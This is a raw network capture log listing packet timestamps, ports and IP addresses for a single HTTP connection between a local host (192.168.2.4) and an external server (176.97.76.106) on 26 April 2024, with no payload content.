Apr 26, 2024 23:09:03.651096106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651160955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651196003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651231050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651262045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651295900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651420116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651432037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651467085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651494980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651508093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651540995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651566029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651578903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651591063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651607990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651632071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651644945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651657104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651664019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651714087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651731014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651756048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651791096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651806116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651863098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651874065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651896000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651918888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651931047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651941061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651951075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651953936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651976109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652084112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652096987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652122021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652136087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652177095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652177095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652223110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652235031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652254105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652257919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652271032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652291059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652314901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652354956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652370930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652523994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652537107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652554035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652580976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652592897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652615070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652921915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.652965069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.652981043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653229952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653264046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653274059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653388977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653399944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653422117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653426886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653439999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653451920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653465033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653485060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653506994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653738976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653767109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653774977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653800964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653824091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653848886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653865099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653903961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.653923988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653937101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.653990984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654228926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654244900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654270887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654282093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654285908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654295921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654309034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654319048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654342890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654350042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654407978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654436111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654443979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654459000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654494047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654506922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654520988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654553890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654578924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654601097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654637098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654650927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654674053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654715061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654743910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654756069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654778004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654799938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654812098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654824018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654848099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.654877901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.654911995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655385017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655407906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655422926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655441999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655447006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655565977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655601025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655611992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655637980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655663967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655679941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655756950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655770063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655791044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655822992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655867100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655917883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655930042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655957937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.655968904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.655996084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656028986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.656054020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656066895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656105042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.656174898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656218052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656229973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656250954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.656383991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656395912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656408072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656419039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.656420946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656433105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.656436920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.656470060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.715786934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.762341022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.799007893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.799021006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.799069881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.861237049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.861361980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.861375093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.861432076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.861453056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.861474037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905483007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905497074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905507088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905519009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905534029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905546904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905549049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905563116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905567884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905605078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905633926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905647993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905672073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905683994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905714035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905730009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.905751944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.905791998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906161070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906196117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906243086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906244040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906270027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906299114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906302929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906364918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906377077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906404018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906409025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906430006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906447887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906476974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906500101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906514883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906538963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906586885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906593084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906615973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906647921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906651974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.906691074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.906724930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907383919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907397032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907407045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907433987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907448053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907483101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907504082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907516956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907552004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907579899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907646894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907658100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907681942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907836914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907874107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.907885075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907924891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907943010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.907963991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908205032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908217907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908235073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908250093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908262968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908281088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908294916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908332109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908339024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908389091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908401012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908420086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908433914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908449888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908471107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908473969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908505917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908529997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908585072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908596992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908617020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908636093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908648968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908674955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908684969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908708096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908723116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.908759117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908782959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.908799887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.909111977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.909146070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.909148932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.909991026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.910024881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.910043001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.910825014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.910868883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.910947084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.910959005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911006927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.911024094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911036015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911056995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911084890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.911086082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911117077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911125898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.911151886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911164999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911184072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.911468983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911488056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.911509991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912024975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912056923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912062883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912076950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912108898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912188053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912203074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912234068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912293911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912307024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912341118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912384987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912398100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912446976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912621975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912633896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912676096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912853956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912894011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.912933111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.912997961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913011074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913041115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.913218975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913292885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913338900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.913418055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913467884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913484097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913511038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.913537025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913578987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.913986921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.913999081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914033890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914151907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914189100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914221048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914227962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914251089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914288998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914346933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914359093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914392948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914446115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914494038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914530039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914670944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914710999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914745092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.914751053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914763927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.914797068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.915467024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.915477991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.915505886 CEST	80	49734	176.97.76.106	192.168.2.4
